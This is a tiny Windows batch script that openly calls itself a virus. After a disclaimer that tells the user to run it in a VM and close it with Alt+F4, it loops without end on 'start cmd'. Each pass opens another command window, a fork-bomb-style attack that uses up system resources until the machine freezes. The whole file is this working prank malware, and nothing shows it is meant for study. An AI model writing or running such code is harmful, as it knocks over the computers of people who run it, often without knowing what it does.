@ echo off
color A
echo THE OWNER OF THIS VIRUS IS NOT RESPONSIBLE FOR WHAT HAPPENDS TO THE COMPUTER IF YOU ARE USING A SAFE ENVIRONMENT LIKE A VM, DO ALT+F4 IF YOU WANT TO CLOSE THIS VIRUS
pause
:x
start cmd
goto x
